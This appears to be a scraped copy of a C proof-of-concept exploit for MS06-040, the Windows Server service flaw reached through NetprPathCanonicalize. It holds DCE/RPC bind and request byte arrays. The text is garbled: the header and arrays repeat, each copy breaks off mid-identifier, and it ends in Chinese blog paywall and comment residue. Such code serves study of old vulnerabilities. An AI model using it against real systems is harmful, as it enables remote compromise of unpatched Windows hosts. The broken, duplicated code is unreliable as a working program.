/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
"/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x00/x00/x00/x00"
"/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x01/x00"
"/xC8/x4F/x32/x4B/x70/x16/xD3/x01/x12/x78/x5A/x47/xBF/x6E/xE1/x88"
"/x03/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00"
"/x2B/x10/x48/x60/x02/x00/x00/x00";
// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
"/x05/x00/x00/x03/x10/x00/x00/x00/x30/x08/x00/x00/x00/x00/x00/x00"
"/x18/x08/x00/x00/x00/x00/x1f/x00/xff/xff/xff/xff/x01/x00/x00/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00";
// path ...
unsigned char DCERPC_Request_RPC_Servic
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
"/x05/x00/x0B/x03/x10/x00/x00/x00/x48/x00/x00/x00/x00/x00/x00/x00"
"/xD0/x16/xD0/x16/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x01/x00"
"/xC8/x4F/x32/x4B/x70/x16/xD3/x01/x12/x78/x5A/x47/xBF/x6E/xE1/x88"
"/x03/x00/x00/x00/x04/x5D/x88/x8A/xEB/x1C/xC9/x11/x9F/xE8/x08/x00"
"/x2B/x10/x48/x60/x02/x00/x00/x00";
// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
"/x05/x00/x00/x03/x10/x00/x00/x00/x30/x08/x00/x00/x00/x00/x00/x00"
"/x18/x08/x00/x00/x00/x00/x1f/x00/xff/xff/xff/xff/x01/x00/x00/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00";
// path ...
unsigned char DCERPC_Request_RPC_Servic
最低0.47元/天 解锁文章
1176
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
